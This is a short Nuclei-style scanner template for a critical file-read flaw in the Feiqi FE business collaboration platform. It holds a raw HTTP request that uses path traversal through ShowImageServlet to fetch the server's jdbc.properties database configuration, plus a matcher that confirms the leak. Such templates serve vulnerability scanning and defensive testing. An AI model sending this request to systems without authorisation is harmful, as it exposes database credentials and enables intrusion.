id: feiqihulianFE

info:
  name: 飞企互联FE业务协作平台文件读取
  author: someone
  severity: critical
requests:
  - raw:
      - |+
        GET /servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Accept-Encoding: gzip

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && contains(body, 'jdbc')"